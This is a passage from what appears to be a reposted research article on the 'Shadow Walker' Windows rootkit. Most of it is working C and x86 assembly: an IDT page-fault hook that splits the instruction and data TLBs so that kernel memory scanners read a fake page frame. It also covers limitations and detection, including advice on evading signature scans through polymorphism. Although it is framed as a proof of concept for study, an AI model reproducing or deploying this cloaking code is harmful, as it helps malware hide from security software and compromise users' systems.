{ //set by default if pDriverEnds is not specified
if( IsInLargePage( pExecutePage ) )
HookedPage.pDriverEnds =
(ULONG)HookedPage.pDriverStarts + LARGE_PAGE_SIZE;
else
HookedPage.pDriverEnds =
(ULONG)HookedPage.pDriverStarts + PAGE_SIZE;
}//end if

__asm cli //disable interrupts

if( hooked == false )
{ HookInt( &g_OldInt0EHandler,
(unsigned long)NewInt0EHandler, 0x0E );
hooked = true;
}//end if

HookedPage.pExecutePte = GetPteAddress( pExecutePage );
HookedPage.pReadWritePte = GetPteAddress( pReadWritePage );

//Insert the hooked page into the list
PushPageIntoHookedList( HookedPage );

//Enable the global page feature
EnableGlobalPageFeature( HookedPage.pExecutePte );

//Mark the page non present
MarkPageNotPresent( HookedPage.pExecutePte );

//Go ahead and flush the TLBs. We want to guarantee that all
//subsequent accesses to this hooked page are filtered
//through our new page fault handler.
__asm invlpg pExecutePage

__asm sti //reenable interrupts
}//end HookMemoryPage

The functionality of the page fault handler is relatively straight forward
despite the seeming complexity of the scheme. Its primary functions are
to determine if a given page fault is originating from a hooked page,
resolve the access type, and then load the appropriate TLB. As such, the
page fault handler has basically two execution paths. If the page is
unhooked, it is passed down to the operating system page fault handler.
This is determined as quickly and efficiently as possible. Faults
originating from user mode addresses or while the processor is running in
user mode are immediately passed down. The fate of kernel mode accesses is
also quickly decided via a hash table lookup. Alternatively, once the page
has been determined to be hooked the access type is checked and directed to
the appropriate TLB loading code (Execute accesses will cause a ITLB load
while Read / Write accesses cause a DTLB load). The procedure for TLB
loading is as follows:

1. The appropriate physical frame mapping is loaded into the PTE for the
faulting address.
2. The page is temporarily marked present.
3. For a DTLB load, a memory read on the hooked page is performed.
4. For an ITLB load, a call into the hooked page is performed.
5. The page is marked as non present again.
6. The old physical frame mapping for the PTE is restored.

After TLB loading, control is directly returned to the faulting code.

/**************************************************************************
* NewInt0EHandler - Page fault handler for the memory hook engine (aka. the
* guts of this whole thing

*
* Parameters - none
*
* Return - none
*
***************************************************************************
void __declspec( naked ) NewInt0EHandler(void)
{
__asm
{
pushad
mov edx, dword ptr [esp+0x20] //PageFault.ErrorCode

test edx, 0x04 //if the processor was in user mode, then
jnz PassDown //pass it down

mov eax,cr2 //faulting virtual address
cmp eax, HIGHEST_USER_ADDRESS
jbe PassDown //we don't hook user pages, pass it down

////////////////////////////////////////
//Determine if it's a hooked page
/////////////////////////////////////////
push eax
call FindPageInHookedList
mov ebp, eax //pointer to HOOKED_PAGE structure
cmp ebp, ERROR_PAGE_NOT_IN_LIST
jz PassDown //it's not a hooked page

///////////////////////////////////////
//NOTE: At this point we know it's a
//hooked page. We also only hook
//kernel mode pages which are either
//non paged or locked down in memory
//so we assume that all page tables
//are resident to resolve the address
//from here on out.
/////////////////////////////////////
mov eax, cr2
mov esi, PROCESS_PAGE_DIR_BASE
mov ebx, eax
shr ebx, 22
lea ebx, [esi + ebx*4] //ebx = pPTE for large page
test [ebx], 0x80 //check if its a large page
jnz IsLargePage

mov esi, PROCESS_PAGE_TABLE_BASE
mov ebx, eax
shr ebx, 12
lea ebx, [esi + ebx*4] //ebx = pPTE

IsLargePage:

cmp [esp+0x24], eax //Is due to an attepmted execute?
jne LoadDTLB

////////////////////////////////
// It's due to an execute. Load
// up the ITLB.
///////////////////////////////
cli
or dword ptr [ebx], 0x01 //mark the page present
call [ebp].pfnCallIntoHookedPage //load the itlb
and dword ptr [ebx], 0xFFFFFFFE //mark page not present
sti
jmp ReturnWithoutPassdown

////////////////////////////////
// It's due to a read /write
// Load up the DTLB
///////////////////////////////
///////////////////////////////
// Check if the read / write
// is originating from code
// on the hidden page.
///////////////////////////////
LoadDTLB:
mov edx, [esp+0x24] //eip
cmp edx,[ebp].pDriverStarts
jb LoadFakeFrame
cmp edx,[ebp].pDriverEnds
ja LoadFakeFrame

/////////////////////////////////
// If the read /write is originating
// from code on the hidden page,then
// let it go through. The code on the
// hidden page will follow protocol
// to clear the TLB after the access.
////////////////////////////////
cli
or dword ptr [ebx], 0x01 //mark the page present
mov eax, dword ptr [eax] //load the DTLB
and dword ptr [ebx], 0xFFFFFFFE //mark page not present
sti
jmp ReturnWithoutPassdown

/////////////////////////////////
// We want to fake out this read
// write. Our code is not generating
// it.
/////////////////////////////////
LoadFakeFrame:
mov esi, [ebp].pReadWritePte
mov ecx, dword ptr [esi] //ecx = PTE of the
//read / write page

//replace the frame with the fake one
mov edi, [ebx]
and edi, 0x00000FFF //preserve the lower 12 bits of the
//faulting page's PTE
and ecx, 0xFFFFF000 //isolate the physical address in
//the "fake" page's PTE
or ecx, edi
mov edx, [ebx] //save the old PTE so we can replace it
cli
mov [ebx], ecx //replace the faulting page's phys frame
//address w/ the fake one

//load the DTLB
or dword ptr [ebx], 0x01 //mark the page present
mov eax, cr2 //faulting virtual address
mov eax, dword ptr[eax] //do data access to load DTLB
and dword ptr [ebx], 0xFFFFFFFE //re-mark page not present

//Finally, restore the original PTE
mov [ebx], edx
sti

ReturnWithoutPassDown:
popad
add esp,4
iretd

PassDown:
popad
jmp g_OldInt0EHandler

}//end asm
}//end NewInt0E

--[ 4 - Known Limitations & Performance Impact

As our current rootkit is intended only as a proof of concept
demonstration rather than a fully engineered attack tool, it possesses
a number of implementational limitations. Most of this functionality
could be added, were one so inclined. First, there is no effort to
support hyperthreading or multiple processor systems. Additionally,
it does not support the Pentium PAE addressing mode which extends
the number of physically addressable bits from 32 to 36. Finally, the
design is limited to cloaking only 4K sized kernel mode pages
(i.e. in the upper 2 GB range of the memory address space). We mention
the 4K page limitation because there are currently some technical
issues with regard to hiding the 4MB page upon which ntoskrnl resides.
Hiding the page containing ntoskrnl would be a noteworthy extension.
In terms of performance, we have not completed rigorous testing, but
subjectively speaking there is no noticeable performance impact after
the rootkit and memory hooking engine are installed. For maximum
performance, as mentioned previously, code and data should remain
on separate pages and the usage of global data should be minimized
to limit the impact on performance if one desires to enable both
data and executable page cloaking.

--[ 5 - Detection

There are at least a few obvious weaknesses that must be dealt with to
avoid detection. Our current proof of concept implementation does not
address them, however, we note them here for the sake of completeness.
Because we must be able to differentiate between normal page faults and
those faults related to the memory hook, we impose the requirement that
hooked pages must reside in non paged memory. Clearly, non present pages
in non paged memory present an abnormality. Weather or not this is a
sufficient heuristic to call a rootkit alarm is, however, debatable.
Locking down pagable memory using an API like MmProbeAndLockPages is
probably more stealthy. The next weakness lies in the need to disguise
the presence of the page fault handler. Because the page where the page
fault handler resides cannot be marked non present due to the obvious
issues with recursive reentry, it will be vulnerable to a simple signature
scan and must be obsfucated using more traditional methods. Since this
routine is small, written in ASM, and does not rely upon any kernel API's,
polymorphism would be a reasonable solution. A related weakness
arises in the need to disguise the presence of the IDT hook. We cannot use
our memory hooking technique to disguise the modifications to the
interrupt descriptor table for similar reasons as the page fault handler.
While we could hook the page fault interrupt via an inline hook rather
than direct IDT modification, placing a memory hook on the page
containing the OS's INT 0E handler is problematic and inline hooks
are easily detected. Joanna Rutkowska proposed using the debug registers
to hide IDT hooks [5], but Edgar Barbosa demonstrated they are not a
completey effective solution [12]. This is due to the fact that debug
registersprotect virtual as opposed to physical addresses. One may simply
remap the physical frame containing the IDT to a different virtual address
and read / write the IDT memory as one pleases. Shadow Walker falls prey
to this type of attack as well, based as it is, upon the exploitation
of virtual rather than physical memory. Despite this aknowleged
weakness, most commercial security scanners still perform virtual
rather than physical memory scans and will be fooled by rootkits like
Shadow Walker. Finally, Shadow Walker is insidious. Even if a scanner
detects Shadow Walker, it will be virtually helpless to remove it on a
running system. Were it to successfully over-write the hook with the
original OS page fault handler, for example, it would likely BSOD the
system because there would be some page faults occurring on the hidden
pages which neither it nor the OS would know how to handle.

--[ 6 - Conclusion

Shadow Walker is not a weaponized attack tool. Its functionality is
limited and it makes no effort to hide it's hook on the IDT or its page
fault handler code. It provides only a practical proof of concept
implementation of virtual memory subversion. By inverting the defensive
software implementation of non executalbe memory, we show that it is
possible to subvert the view of virtual memory relied upon by the
operating system and almost all security scanner applications. Due to its
exploitation of the TLB architecture, Shadow Walker is transparent and
exhibits an extremely light weight performance hit. Such characteristics
will no doubt make it an attractive solution for viruses, worms, and
spyware applications in addition to rootkits.

Raising The Bar For Windows Rootkit Detection

Osiris

Golden Master

Similar threads